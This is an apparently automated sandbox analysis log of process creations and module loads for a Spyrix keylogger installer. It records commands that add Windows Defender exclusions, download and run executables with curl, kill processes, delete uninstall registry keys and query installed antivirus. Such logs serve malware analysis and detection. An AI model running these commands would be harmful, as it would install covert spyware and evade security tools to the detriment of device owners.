Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg export "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" "C:\Users\user\AppData\Local\Temp\is-MAGA0.tmp\ex" /y
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Process created: C:\Windows\SysWOW64\taskkill.exe "C:\Windows\system32\taskkill.exe" /IM cmd.exe /IM wlg.exe /IM spmm.exe /IM spkl.exe /IM spm.exe /IM sem.exe /IM clv.exe /IM akl.exe /IM sps.exe /IM sime64.exe /IM ff.exe /IM mrec.exe /IM clvhost.exe /IM ffws.exe
Source: C:\Windows\SysWOW64\taskkill.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Process created: C:\Windows\SysWOW64\taskkill.exe "C:\Windows\system32\taskkill.exe" /IM cmd.exe /IM wlg.exe /IM spmm.exe /IM spkl.exe /IM spm.exe /IM sem.exe /IM clv.exe /IM akl.exe /IM sps.exe /IM sime64.exe /IM ff.exe /IM mrec.exe /IM clvhost.exe /IM ffws.exe /F
Source: C:\Windows\SysWOW64\taskkill.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Process created: C:\Windows\SysWOW64\regedit.exe "regedit.exe" /e "C:\ProgramData\Spyrix Free Keylogger\temp\reg\info.uid" "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall\Spyrix Free Keylogger_is1"
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Process created: C:\Windows\SysWOW64\reg.exe "reg.exe" delete "HKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Spyrix Free Keylogger_is1" /f
Source: C:\Windows\SysWOW64\reg.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Process created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe "C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe"
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\plist.vbs"
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c plist.cmd
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\chcp.com chcp 65001
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout 20
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\dashboard.cmd" "
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout 6
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c netstat.exe -e > "C:\Users\user\AppData\Local\Temp\nse"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\NETSTAT.EXE netstat.exe -e
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://dashboard.spyrix.com/
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2180 --field-trial-handle=1912,i,17144999493896228581,15445594864361974383,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Process created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe "C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe" --insecure -d @app_Monitoring_StartButton_C79C6F489015E0BC97F892E357DB7156 https://spyrix.net/dashboard/prg-actions
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Process created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe "C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe" --insecure -d @app_Monitoring_Start_C79C6F489015E0BC97F892E357DB7156 https://spyrix.net/dashboard/prg-actions
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Process created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe "C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe" --insecure -d @app_Run_First_C79C6F489015E0BC97F892E357DB7156 https://spyrix.net/dashboard/prg-actions
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Process created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe "C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe" "Spyrix Free Keylogger 11.6.22"
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Process created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe "C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe" --insecure -d @app_wizard_Start_C79C6F489015E0BC97F892E357DB7156 https://spyrix.net/dashboard/prg-actions
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c exit 83
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c exit 112
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c exit 121
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c exit 114
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c exit 105
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c exit 120
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe TASKLIST /FI "IMAGENAME eq spm.exe" /FO CSV /NH
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\find.exe find "spm"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe TASKLIST /FI "IMAGENAME eq sem.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg query "HKU\S-1-5-19\Environment"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath "'C:\Users\user\AppData\Local\Temp\183942631522663'"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl.exe --insecure -o "C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe" https://filedn.com/lHeD6Etwo8g0FE5cMVwEMkH/56ysdvbdckuh27dqLygst354csjnd/404	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe "C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Remove-MpPreference -exclusionPath "C:\Users\user\AppData\Local\Temp\183942631522663"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c C:\Users\user\AppData\Local\Temp\c8f0ad90-24c5-4e6e-bb8b-4ca36210d878\\c8f0ad90-24c5-4e6e-bb8b-4ca36210d878.cmd	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg query "HKU\S-1-5-19\Environment"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath "'C:\Users\user\AppData\Local\Temp\c8f0ad90-24c5-4e6e-bb8b-4ca36210d878'"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\curl.exe curl.exe --insecure --user-agent "sfk-dst-loader-2.0" -o "C:\Users\user\AppData\Local\Temp\c8f0ad90-24c5-4e6e-bb8b-4ca36210d878\l" https://cdnbaynet.com/loader/link.php?prg_id=sfk	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\curl.exe curl.exe --insecure --user-agent "sfk-dst-loader-2.0" -o "C:\Users\user\AppData\Local\Temp\c8f0ad90-24c5-4e6e-bb8b-4ca36210d878\[space]= .exe" https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\c8f0ad90-24c5-4e6e-bb8b-4ca36210d878\[space]= .exe "C:\Users\user\AppData\Local\Temp\c8f0ad90-24c5-4e6e-bb8b-4ca36210d878\[space]= .exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\c8f0ad90-24c5-4e6e-bb8b-4ca36210d878\[space]= .exe	Process created: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp "C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp" /SL5="$30462,32862490,227328,C:\Users\user\AppData\Local\Temp\c8f0ad90-24c5-4e6e-bb8b-4ca36210d878\[space]= .exe"
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Users\user\AppData\Local\Temp\is-MAGA0.tmp\d.cmd
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Users\user\AppData\Local\Temp\is-MAGA0.tmp\d.cmd
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Users\user\AppData\Local\Temp\is-MAGA0.tmp\ex.cmd
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Users\user\AppData\Local\Temp\is-MAGA0.tmp\pswd.cmd
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Users\user\AppData\Local\Temp\is-MAGA0.tmp\ex.cmd
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Process created: C:\Windows\SysWOW64\taskkill.exe "C:\Windows\system32\taskkill.exe" /IM cmd.exe /IM wlg.exe /IM spmm.exe /IM spkl.exe /IM spm.exe /IM sem.exe /IM clv.exe /IM akl.exe /IM sps.exe /IM sime64.exe /IM ff.exe /IM mrec.exe /IM clvhost.exe /IM ffws.exe
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Process created: C:\Windows\SysWOW64\taskkill.exe "C:\Windows\system32\taskkill.exe" /IM cmd.exe /IM wlg.exe /IM spmm.exe /IM spkl.exe /IM spm.exe /IM sem.exe /IM clv.exe /IM akl.exe /IM sps.exe /IM sime64.exe /IM ff.exe /IM mrec.exe /IM clvhost.exe /IM ffws.exe /F
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Process created: C:\Windows\SysWOW64\regedit.exe "regedit.exe" /e "C:\ProgramData\Spyrix Free Keylogger\temp\reg\info.uid" "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall\Spyrix Free Keylogger_is1"
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Process created: C:\Windows\SysWOW64\reg.exe "reg.exe" delete "HKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Spyrix Free Keylogger_is1" /f
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Process created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe "C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe"
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Process created: C:\Windows\System32\reg.exe reg export "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" "C:\Users\user\AppData\Local\Temp\is-MAGA0.tmp\ex" /y
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\dashboard.cmd" "
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "wmic /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /value"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /value
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "wmic /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /value"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /value
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg export "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" "C:\Users\user\AppData\Local\Temp\is-MAGA0.tmp\ex" /y
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -ExclusionProcess '[space]= .*'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -ExclusionProcess 'C:\ProgramData\Security Monitor\*'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\sps.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -ExclusionProcess 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -ExclusionProcess 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\sps.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -ExclusionProcess 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg export "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" "C:\Users\user\AppData\Local\Temp\is-MAGA0.tmp\ex" /y
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c netstat.exe -e > "C:\Users\user\AppData\Local\Temp\nse"
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Process created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe "C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe" --insecure -d @app_Monitoring_StartButton_C79C6F489015E0BC97F892E357DB7156 https://spyrix.net/dashboard/prg-actions
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Process created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe "C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe" --insecure -d @app_Monitoring_Start_C79C6F489015E0BC97F892E357DB7156 https://spyrix.net/dashboard/prg-actions
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Process created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe "C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe" --insecure -d @app_Run_First_C79C6F489015E0BC97F892E357DB7156 https://spyrix.net/dashboard/prg-actions
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Process created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe "C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe" "Spyrix Free Keylogger 11.6.22"
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Process created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe "C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe" --insecure -d @app_wizard_Start_C79C6F489015E0BC97F892E357DB7156 https://spyrix.net/dashboard/prg-actions
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c plist.cmd
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\chcp.com chcp 65001
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout 20
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c exit 83
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c exit 112
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c exit 121
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c exit 114
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c exit 105
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c exit 120
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe TASKLIST /FI "IMAGENAME eq spm.exe" /FO CSV /NH
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\find.exe find "spm"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe TASKLIST /FI "IMAGENAME eq sem.exe" /FO CSV /NH
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout 6
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://dashboard.spyrix.com/
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\NETSTAT.EXE netstat.exe -e
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2180 --field-trial-handle=1912,i,17144999493896228581,15445594864361974383,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown

Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: secur32.dll	Jump to behavior
